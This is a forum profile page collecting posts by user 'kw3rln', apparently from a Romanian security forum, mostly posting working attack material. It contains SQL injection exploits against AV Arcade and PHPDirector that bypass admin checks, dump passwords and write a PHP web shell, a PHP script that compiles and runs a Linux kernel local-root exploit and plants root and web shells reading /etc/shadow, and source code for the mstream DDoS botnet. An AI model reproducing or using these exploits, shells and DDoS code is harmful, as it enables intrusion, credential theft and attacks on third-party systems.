kw3rln
-
Posts
1019 -
Joined
-
Last visited
Everything posted by kw3rln
-
AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights Web: AV Arcade 2.1b Site : www.avscripts.net Dork : "Powered By AV Arcade" Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET Vurnerable code: admin/index.php: $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid'].""); while($row = mysql_fetch_array($sql)){ if ($row['admin'] == 1) { define( 'ADMIN_ACCESS', 1 ); [...] Exploit: Set in your cookies: ava_userid = 1; and that`s all GREETZ: all memberz of RST and milw0rm //kw3rln [ http://rstzone.net ] [EOF]
-
AV Arcade 2.1b (view_page.php) Remote SQL Injection Web: AV Arcade 2.1b Site : www.avscripts.net Dork : "Powered By AV Arcade" Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET Description: SQL injection in $id of includes/view_page.php Exploit: index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password,4,5,6,7,8,9,10,11,12,13%20FROM%20ava_users%20WHERE%20id=1 GREETZ: all memberz of RST and milw0rm //kw3rln [ http://rstzone.net ] [EOF]
-
si io am un sql injection in softu asta da altundeva ..trebuie sal public si io
-
PHPDirector <= 0.21 (SQL injection/Upload SHELL) Remote Vulnerabilities WEB APP: PHPDirector 0.21 SITE: http://www.phpdirector.co.uk/site/ DORK: "Powered by PHP Director" AUTHOR: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] * Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET DESCRIPTION: - SQL injection in $id of videos.php - admin & password are in config.php - Path disclosure - It doesn`t deserve to make an sploit EXPLOIT: SQL INJECTION: http://www.site.com/videos.php?id=-1%20UNION%20SELECT%20name,news,vids_per_page,version,template,6,7,8,9,10,11,12,13,14,15%20FROM%20pp_config FIND ADMIN PASS & DB INFO: 1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure) 2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,load_file('[path_you_just_found]/config.php')%20FROM%20pp_config%20into%20outfile%20'[path_you_just_found]/config.txt' 3. Now check: http://www.site.com/config.txt UPLOAD SHELL: 1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure) 2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,'<?php%20system($_GET[cmd]);%20?>',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'[path_founded]/shell.php'%20FROM%20pp_config 3. http://www.site.com/shell.php?cmd=uname -a GREETZ: all memberz of RST and milw0rm //kw3rln [http://rstzone.net] [EOF]
-
Yahoo!Messenger Monitor Sniffer v3.0 (Am pus serial number)
kw3rln replied to EthicalHacker's topic in Programe hacking
depinde ff mult de cum ii structurata reteaua... dak traficul care vrei sal prinzi trece prin switchu tau de acasa atunci cel mai mult probabil prinzi packetele dorite..altfel nu prea cred... -
fain joc si acuma exploitu pt el: http://www.babilonics.com/node/1104
-
Link: http://rapidshare.com/files/11826381/i-r0x_Port_Blocker_1.0_Beta.zip.html Overview: This programs purpose is to open your TCP/UDP Ports(Those selected) half way. If an intruder tries to connect to you, or scans your IP, and in doing so, will catch the intrusion attempt, log the attackers IP, and will reject him any information on the details of your system. Mainly, this plays a "Man in the Middle" approach, so that when an attacker assumes you're vulnerable, when you're not(or are, that's why I made this), you trick him into his intentions, thus, in the end, the attacker will be wasting his time. This could be regarded as a tiny IDS(Intrusion Detection System) but I'll just leave it as a Port Blocker for now. How to use: I've put bounderies on a few areas, so to know what to do read and understand the following. To add a single port, click Add, then Listen. You must add atleast ONE port in order for the program to work. Once you've got ports displayed under the "Blocked Port" List, you must highlight atleast one of them to listen. Once you've began listening, the program will listen to All ports, listed in the Ports Blocked List. Also be note that you don't overwrite your Port List, as I'm sure some of you might want to make your own specific port lists, and my Cmndlg control will not notify you of an overwritten file alert... so always keep a backup of your Port lists. Unintentional Implementations as follows: This program can easily be used to HiJack an unsuspecting users IP This program doesn't work the best under WIFI Connections. This program May interrupt certain services, if they are explicitly depended on, under your Operating System. This program works under Windows 98, Windows 2000, Windows XP Home and Pro. by xyr0x
-
ProAgent 2.1.9 SpecialEdition Packed by: ACProtect 2.0 Now UnPacked. dl: http://rapidshare.com/files/34644688/Pa219un.rar
-
Usage: bamcompile [-options] infile.php [outfile.exe] bamcompile [-options] project_directory mainfile.php [outfile.exe] Options: -w Hide console window for windowed applications -c Compress output exe (using UPX - must be available) -d Do not encode PHP files www.bambalam.se/bamcompile Download Bamcompile===>http://www.bambalam.se/bamcompile/download/bamcompile1.21.zip Download Source===>http://www.bambalam.se/bamcompile/download/bamcompile_source1.21.zip
-
<?php /* ####################################### # # # PRIVATE! PRIVATE! PRIVATE! # # # # XOR CREW # # # # # ####################################### */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... "; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
-
link: http://www.ussrback.com/docs/distributed/mstream.txt Makefile: ------------------------ CC = gcc # -g is so i can debug it better # -Wall so i can be happy CFLAGS = -g -Wall all: master server clean: rm -f master server master: master.c $(CC) $(CFLAGS) -o master master.c server: server.c $(CC) $(CFLAGS) -o server server.c ------------------------ master.c ------------------------ /* spwn */ #define PASSWORD "sex" #define SERVERFILE ".sr" #define MASTER_TCP_PORT 6723 #define MASTER_UDP_PORT 9325 #define SERVER_PORT 7983 #define MAXUSERS 3 #define USED 1 #define AUTH 2 #define max(one, two) (one > two ? one : two) #define MAX_IP_LENGTH 17 #define MAX_HOST_LENGTH 200 #include <unistd.h> #include <sys/time.h> #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/uio.h> #include <signal.h> /* prototypes for my functions */ void sighandle (int); int maxfd (int, int); void prompt (int); void tof (char *); void fof (char *); void send2server (u_long, char *, ...); void forkbg (void); void nlstr (char *); void sendtoall (char *, ...); char *inet_ntoa (struct in_addr); u_long inet_addr (const char *); int findfree (void); /* end of prototypes */ typedef struct _socks { int fd; int opts; int idle; char *ip; } socks; socks users[MAXUSERS]; int main (int argc, char *argv[]) { fd_set readset; int i, tcpfd, udpfd, socksize, pongs = 0; struct sockaddr_in udpsock, tcpsock, remotesock; struct timeval t; char ibuf[1024], obuf[1024], *arg[3]; signal(SIGINT, sighandle); signal(SIGHUP, sighandle); signal(SIGSEGV, sighandle); socksize = sizeof(struct sockaddr); if ((tcpfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(0); } if ((udpfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket"); exit(0); } tcpsock.sin_family = AF_INET; tcpsock.sin_port = htons(MASTER_TCP_PORT); tcpsock.sin_addr.s_addr = INADDR_ANY; memset(&tcpsock.sin_zero, 0, 8); if (bind(tcpfd, (struct sockaddr *)&tcpsock, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(0); } if (listen(tcpfd, MAXUSERS+1) == -1) { perror("listen"); exit(0); } i = 1; if (setsockopt(tcpfd, SOL_SOCKET, SO_KEEPALIVE, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } i = 1; if (setsockopt(tcpfd, SOL_SOCKET, SO_REUSEADDR, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } if (fcntl(tcpfd, F_SETFL, O_NONBLOCK) == -1) { perror("fcntl"); exit(0); } udpsock.sin_family = AF_INET; udpsock.sin_port = htons(MASTER_UDP_PORT); udpsock.sin_addr.s_addr = INADDR_ANY; memset(&udpsock.sin_zero, 0, 8); if (bind(udpfd, (struct sockaddr *)&udpsock, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(0); } i = 1; if (setsockopt(udpfd, SOL_SOCKET, SO_KEEPALIVE, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } i = 1; if (setsockopt(udpfd, SOL_SOCKET, SO_REUSEADDR, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } for (i = 0 ; i <= MAXUSERS ; i++) { users[i].opts = (0 & ~USED); } forkbg(); t.tv_sec = 2; t.tv_usec = 1; for ( { for (i = 0 ; i <= MAXUSERS ; i++) if (users[i].opts & USED) if ((time(0) - users[i].idle) > 420) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nYou're too idle !\n"); send(users[i].fd, &obuf, strlen(obuf), 0); close(users[i].fd); users[i].opts &= ~USED; } FD_ZERO(&readset); FD_SET(tcpfd, &readset); FD_SET(udpfd, &readset); for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) FD_SET(users[i].fd, &readset); } if (select(maxfd(tcpfd, udpfd)+1, &readset, NULL, NULL, &t) == -1) continue; if (FD_ISSET(tcpfd, &readset)) { int socknum; u_long ip; struct hostent *hp; if ((socknum = findfree()) == -1) { socknum = accept(tcpfd, (struct sockaddr *)&remotesock, &socksize); close(socknum); continue; } users[socknum].fd = accept(tcpfd, (struct sockaddr *)&remotesock, &socksize); for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nConnection from %s\n", inet_ntoa(remotesock.sin_addr)); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } } users[socknum].opts = (USED & ~AUTH); ip = remotesock.sin_addr.s_addr; if ((hp = gethostbyaddr((char *)&ip, sizeof ip, AF_INET)) == NULL) { users[socknum].ip = (char *) malloc(MAX_IP_LENGTH); strncpy(users[socknum].ip, inet_ntoa(remotesock.sin_addr), MAX_IP_LENGTH-1); } else { users[socknum].ip = (char *) malloc(MAX_HOST_LENGTH); strncpy(users[socknum].ip, hp->h_name, MAX_HOST_LENGTH-1); } users[socknum].idle = time(0); } if (FD_ISSET(udpfd, &readset)) { memset(&ibuf, 0, sizeof ibuf); if (recvfrom(udpfd, &ibuf, (sizeof ibuf)-1, 0, (struct sockaddr *)&remotesock, &socksize) <= 0) continue; nlstr(ibuf); if (!strcmp(ibuf, "newserver")) { FILE *f; char line[1024]; int i; if ((f = fopen(SERVERFILE, "r")) == NULL) { f = fopen(SERVERFILE, "w"); fclose(f); continue; } while (fgets(line, (sizeof line)-1, f)) { nlstr(line); fof(line); nlstr(line); if (!strcmp(line, inet_ntoa(remotesock.sin_addr))) { continue; } } fclose(f); if ((f = fopen(SERVERFILE, "a")) == NULL) continue; memset(&obuf, 0, sizeof obuf); snprintf(obuf,(sizeof obuf)-1, "%s\n", inet_ntoa(remotesock.sin_addr)); tof(obuf); fprintf(f, "%s\n", obuf); for (i = 0 ; i <= MAXUSERS ; i++) if (users[i].opts & USED) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nNew server on %s.\n", inet_ntoa(remotesock.sin_addr)); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } fclose(f); } if (!strcmp(ibuf, "pong")) { pongs++; for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nGot pong number %d from %s\n", pongs, inet_ntoa(remotesock.sin_addr)); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } } } } for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) { if (FD_ISSET(users[i].fd, &readset)) { if (!(users[i].opts & AUTH)) { int x; memset(&ibuf, 0, sizeof ibuf); if (recv(users[i].fd, &ibuf, (sizeof ibuf)-1, 0) <= 0) { int y; users[i].opts = (~AUTH & ~USED); memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "%s has disconnected (not auth'd): %s\n", users[i].ip, strerror(errno)); for (y = 0 ; y <= MAXUSERS ; y++) if (users[y].opts & USED) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } close(users[i].fd); free(users[i].ip); continue; } users[i].idle = time(0); for (x = 0 ; x <= strlen(ibuf) ; x++) { if (ibuf[x] == '\n') ibuf[x] = '\0'; if (ibuf[x] == '\r') ibuf[x] = '\0'; } if (strcmp(ibuf, PASSWORD)) { int y; memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Invalid password from %s.\n", users[i].ip); for (y = 0 ; y <= MAXUSERS ; y++) if ((users[y].opts & USED) && (y != i)) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } free(users[i].ip); close(users[i].fd); users[i].opts = (~AUTH & ~USED); continue; } for (x = 0 ; x <= MAXUSERS ; x++) { if ((users[x].opts & USED) && (x != i)) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nPassword accepted for connection from %s.\n", users[i].ip); send(users[x].fd, &obuf, strlen(obuf), 0); prompt(users[x].fd); } } users[i].opts |= AUTH; prompt(users[i].fd); continue; } memset(&ibuf, 0, sizeof ibuf); if (recv(users[i].fd, &ibuf, (sizeof ibuf)-1, 0) <= 0) { int y; memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Lost connection to %s: %s\n", users[i].ip, strerror(errno)); for (y = 0 ; y <= MAXUSERS ; y++) if (users[y].opts & USED) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } free(users[i].ip); close(users[i].fd); users[i].opts = (~AUTH & ~USED); continue; } arg[0] = strtok(ibuf, " "); arg[1] = strtok(NULL, " "); arg[2] = strtok(NULL, " "); arg[3] = NULL; if (arg[2]) nlstr(arg[2]); if (!strncmp(arg[0], "stream", 6)) { struct hostent *hp; struct in_addr ia; if ((!arg[1]) || (!arg[2])) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "Usage: stream <hostname> <seconds>\n"); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); continue; } if ((hp = gethostbyname(arg[1])) == NULL) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Unable to resolve %s.\n", arg[1]); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); continue; } memcpy(&ia.s_addr, &hp->h_addr, hp->h_length); sendtoall("stream/%s/%s", inet_ntoa(ia), arg[2]); memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Streaming %s for %s seconds.\n", arg[1], arg[2]); send(users[i].fd, &obuf, strlen(obuf), 0); } if (!strncmp(arg[0], "quit", 4)) { int y; memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "%s has disconnected.\n", users[i].ip); for (y = 0 ; y <= MAXUSERS ; y++) if ((users[y].opts & USED) && y != i) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } free(users[i].ip); close(users[i].fd); users[i].opts = (~AUTH & ~USED); continue; } if (!strncmp(arg[0], "servers", 7)) { FILE *f; char line[1024]; if ((f = fopen(SERVERFILE, "r")) == NULL) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nServer file doesn't exist, creating \n"); send(users[i].fd, &obuf, strlen(obuf), 0); f = fopen(SERVERFILE, "w"); fclose(f); prompt(users[i].fd); continue; } memset(&obuf, 0, sizeof obuf); sprintf(obuf, "The following ips are known servers: \n"); send(users[i].fd, &obuf, strlen(obuf), 0); while (fgets(line, (sizeof line)-1, f)) { nlstr(line); fof(line); send(users[i].fd, &line, strlen(line), 0); } fclose(f); } if (!strncmp(arg[0], "help", 4) || !strncmp(arg[0], "commands", 8)) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nAvailable commands: \n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "stream\t\t--\tstream attack !\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "servers\t\t--\tPrints all known servers.\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "ping\t\t--\tping all servers.\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "who\t\t--\ttells you the ips of the people logged in\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "mstream\t\t--\tlets you stream more than one ip at a time\n"); send(users[i].fd, &obuf, strlen(obuf), 0); } if (!strncmp(arg[0], "who", 3)) { int x; memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nCurrently Online: \n"); send(users[i].fd, &obuf, strlen(obuf), 0); for (x = 0 ; x <= MAXUSERS ; x++) { memset(&obuf, 0, sizeof obuf); if (users[x].opts & USED && users[x].opts & AUTH) { snprintf(obuf, (sizeof obuf)-1, "Socket number %d\t[%s]\n", x, users[x].ip); send(users[i].fd, &obuf, strlen(obuf), 0); } } memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\n"); send(users[i].fd, &obuf, strlen(obuf), 0); } if (!strncmp(arg[0], "ping", 4)) { pongs = 0; memset(&obuf, 0, sizeof obuf); sprintf(obuf, "Pinging all servers.\n"); send(users[i].fd, &obuf, strlen(obuf), 0); sendtoall("ping"); } if (!strncmp(arg[0], "mstream", 7)) { if ((!arg[1]) || (!arg[2])) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "Usage: mstream <ip1:ip2:ip3:...> <seconds>\n"); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); continue; } memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "MStreaming %s for %s seconds.\n", arg[1], arg[2]); send(users[i].fd, &obuf, strlen(obuf), 0); sendtoall("mstream/%s/%s\n", arg[1], arg[2]); } prompt(users[i].fd); } } } } } int findfree (void) { int i; for (i = 0 ; i <= MAXUSERS ; i++) { if (!(users[i].opts & USED)) return i; } return -1; } void forkbg (void) { int pid; pid = fork(); if (pid == -1) { perror("fork"); exit(0); } if (pid > 0) { printf("Forked into background, pid %d\n", pid); exit(0); } } void nlstr (char *str) { int i; for (i = 0 ; str[i] != NULL ; i++) if ((str[i] == '\n') || (str[i] == '\r')) str[i] = '\0'; } void send2server (u_long addr, char *str, ...) { va_list vl; char buf[1024]; int fd; struct sockaddr_in sock; va_start(vl, str); vsnprintf(buf, (sizeof buf)-1, str, vl); va_end(vl); if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) return; sock.sin_family = AF_INET; sock.sin_port = htons(SERVER_PORT); sock.sin_addr.s_addr = addr; memset(&sock.sin_zero, 0, 8); sendto(fd, &buf, strlen(buf), 0, (struct sockaddr *)&sock, sizeof(struct sockaddr)); } void tof (char *str) { int i; for (i = 0 ; str[i] != 0 ; i++) str[i]+=50; } void fof (char *str) { int i; for (i = 0 ; str[i] != 0 ; i++) str[i]-=50; } void sendtoall (char *str, ...) { va_list vl; char buf[1024], line[1024]; struct sockaddr_in sock; int fd; FILE *f; va_start(vl, str); vsnprintf(buf, (sizeof buf)-1, str, vl); va_end(vl); if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) return; sock.sin_family = AF_INET; sock.sin_port = htons(SERVER_PORT); memset(&sock.sin_zero, 0, 8); if ((f = fopen(SERVERFILE, "r")) == NULL) { f = fopen(SERVERFILE, "w"); fclose(f); return; } while (fgets(line, (sizeof line)-1, f)) { nlstr(line); fof(line); nlstr(line); sock.sin_addr.s_addr = inet_addr(line); sendto(fd, &buf, strlen(buf), 0, (struct sockaddr *)&sock, sizeof(struct sockaddr)); } } void prompt (int fd) { char buf[5]; memset(&buf, 0, sizeof buf); sprintf(buf, "> "); send(fd, &buf, strlen(buf), 0); } int maxfd (int extra1, int extra2) { int mfd = 0, i; for (i = 0 ; i <= MAXUSERS ; i++) if (users[i].opts & USED) mfd = max(mfd, users[i].fd); mfd = max(max(extra1, extra2), mfd); return mfd; } void sighandle (int sig) { int i; char obuf[1024]; memset(&obuf, 0, sizeof obuf); switch (sig) { case SIGHUP: snprintf(obuf, (sizeof obuf)-1, "Caught SIGHUP, ignoring.\n"); break; case SIGINT: snprintf(obuf, (sizeof obuf)-1, "Caught SIGINT, ignoring.\n"); break; case SIGSEGV: snprintf(obuf, (sizeof obuf)-1, "Segmentation Violation, Exiting cleanly..\n"); break; default: snprintf(obuf, (sizeof obuf)-1, "Caught unknown signal, This should not happen.\n"); } for (i = 0 ; i <= MAXUSERS ; i++) if ( (users[i].opts & USED) && (users[i].opts & AUTH) ) { send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } if (sig == SIGSEGV) exit(1); } ------------------------ server.c ------------------------ /* spwn */ char *m[]={ "1.1.1.1", /* first master */ "2.2.2.2", /* second master */ "3.3.3.3", /* third master etc */ 0 }; #define MASTER_PORT 9325 #define SERVER_PORT 7983 #include <sys/time.h> #include <strings.h> #include <stdarg.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <fcntl.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <netdb.h> #include <sys/uio.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif void forkbg (void); void send2master (char *, struct in_addr); void stream (int, int, u_long, char **); void nlstr (char *); int main (int argc, char *argv[]) { struct in_addr ia; struct sockaddr_in sock, remote; int fd, socksize, opt = 1, i; char buf[1024]; if (getuid() != 0) { fprintf(stderr, "Must be ran as root.\n"); exit(0); } if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket"); exit(0); } sock.sin_family = AF_INET; sock.sin_port = htons(SERVER_PORT); sock.sin_addr.s_addr = INADDR_ANY; memset(&sock.sin_zero, 0, 8); if (bind(fd, (struct sockaddr *)&sock, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(0); } if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (void *)&opt, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } forkbg(); for (i = 0 ; m[i] != 0 ; i++) { ia.s_addr = inet_addr(m[i]); send2master("newserver", ia); } for ( { socksize = sizeof(struct sockaddr); memset(&buf, 0, sizeof buf); if (recvfrom(fd, &buf, (sizeof buf)-1, 0, (struct sockaddr *)&remote, &socksize) <= 0) continue; if (!strncmp(buf, "stream", 6)) { char *ip; int seconds; nlstr(buf); (void)strtok(buf, "/"); ip = strtok(NULL, "/"); seconds = atoi(strtok(NULL, "/")); stream(0, (seconds + time(0)), inet_addr(ip), NULL); } if (!strncmp(buf, "mstream", 7)) { char *ips, *ipps[50], *tmpip; int seconds, y = 1; nlstr(buf); (void)strtok(buf, "/"); ips = strtok(NULL, "/"); seconds = atoi(strtok(NULL, "/")); if ((tmpip = strtok(ips, ":")) == NULL) continue; ipps[0] = (char *) malloc(strlen(tmpip)+2); strncpy(ipps[0], tmpip, strlen(tmpip)+2); y = 1; while ((tmpip = strtok(NULL, ":")) != NULL) { ipps[y] = (char *)malloc(strlen(tmpip)+2); strncpy(ipps[y], tmpip, strlen(tmpip)+2); y++; } ipps[y] = NULL; stream(1, (seconds + time(0)), NULL, ipps); for (y = 0 ; ipps[y] != NULL ; y++) free(ipps[y]); } if (!strncmp(buf, "ping", 4)) { send2master("pong", remote.sin_addr); } } /* for( */ } /* main */ void send2master (char *buf, struct in_addr addr) { struct sockaddr_in sock; int fd; if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) return; sock.sin_family = AF_INET; sock.sin_port = htons(MASTER_PORT); sock.sin_addr = addr; memset(&sock.sin_zero, 0, 8); sendto(fd, buf, strlen(buf), 0, (struct sockaddr *)&sock, sizeof(struct sockaddr)); } void forkbg (void) { int pid; pid = fork(); if (pid == -1) { perror("fork"); exit(0); } if (pid > 0) { printf("Forked into background, pid %d\n", pid); exit(0); } } struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long saddr, daddr; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ 